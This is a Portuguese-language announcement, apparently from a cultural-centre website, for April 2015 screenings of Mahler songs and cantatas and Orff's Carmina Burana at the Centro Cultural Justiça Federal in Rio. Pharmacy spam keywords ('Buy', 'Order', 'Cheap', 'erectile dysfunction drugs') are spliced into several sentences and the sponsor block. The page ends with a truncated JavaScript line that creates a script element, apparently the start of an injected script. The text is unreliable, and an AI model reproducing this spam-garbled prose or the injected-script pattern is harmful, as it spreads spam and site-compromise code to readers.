CD/DVDProgramaçãoRio de Janeiro

Ministério da Cultura, a Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais

A cada encontro, um desafio!

Com a produção de Saulo Chermont, a Série Desafios Musicais deste mês apresentará canções e cantatas de dois grandes compositores, Gustav Mahler (1860-1911) e Carl Orff (1895-1982). Muito conhecido, mas ainda criticado por alguns, por suas obras de grandes proporções, Mahler escreveu:”A sinfonia deve ser um mundo, deve abranger tudo“. Já Orff, alemão de Munique, apesar de ter composto incontáveis obras de grande escala para o palco, obteve fama duradoura com a cantata  Buy Carmina Burana, estreada em 1937 e raramente apresentada no Brasil por suas grandes exigências de interpretação.

O apresentador e palestrante convidado das duas sessões será o crítico musical e professor Rodolfo Valverde.

 

Na 1ª Sessão às 14 horas, obras Order  de Gustav Mahler, começando com as  Buy canções extraídas das sinfonias Wunderhorn (2ª, 3ª e 4ª sinfonias): Urlicht, Santo Antônio e os peixes, Chega o Verão e Das himmlische Leben, dentre outras. Os intérpretes são o barítono norte-americano Thomas Hampson, acompanhado pelo pianista alemão Wolfram Rieger. Gravado ao vivo no Théâtre Musical de Paris – Châtelet em 2002.

A seguir, a cantata Das Klagende Lied na versão original de 1880, interpretada por solistas, Orquestra e Coro da Filarmônica de Londres sob a regência do russo Vladimir Jurowski. Gravado ao vivo em 2007 no Southbank Centre’s, Royal Festival Hall, Londres.


Na 2ª Sessão às 16 horas, 
a cantata coral Carmina Burana, de Carl Orff, composta sobre textos medievais satíricos descobertos no século XIX no Mosteiro Benediktbeuern. Servindo de abertura e finale, o evocativo O Fortuna é uma das obras mais conhecidas da música do século XX. Interpretada por solistas, orquestra e coro da Orquestra de Paris, sob a regência de Bruno Hamard. Gravado ao vivo na Salle de Concert da Cité de La Musique – Philharmonie 2, em janeiro de 2015.

 


SERVIÇO

 

Cinema Cultural Justiça Federal

Dia 11 de abril de 2015, sábado, às 14 e às 16h.

Ingressos R$ 10,00 e R$ 5,00 (meia) para cada sessão.

Livre para todas as idades.

Programação musical sujeita a alterações sem aviso prévio.

 

Gustav Mahler – Trecho de “Das klagende lied” – Michael Hendrick
London Philharmonic Orchestra – Vladimir Jurowski

 

Carl Orff – “O fortuna” da cantata “Carmina Burana”

 

 
Cheap

Order

Apoio Institucional Patrocínio erectile dysfunction drugs Buy Realização
incentivo %C3%A0 cultura Ministério da Cultura, Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais. CCJF cor 100 Ministério da Cultura, Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais. klabin 150 Ministério da Cultura, Klabin S.A. e o Centro Cultural Justiça Federal apresentam: Desafios Musicais. online Minc - pátria educadora

 

 var d=document;var s=d.createElement(‘script’);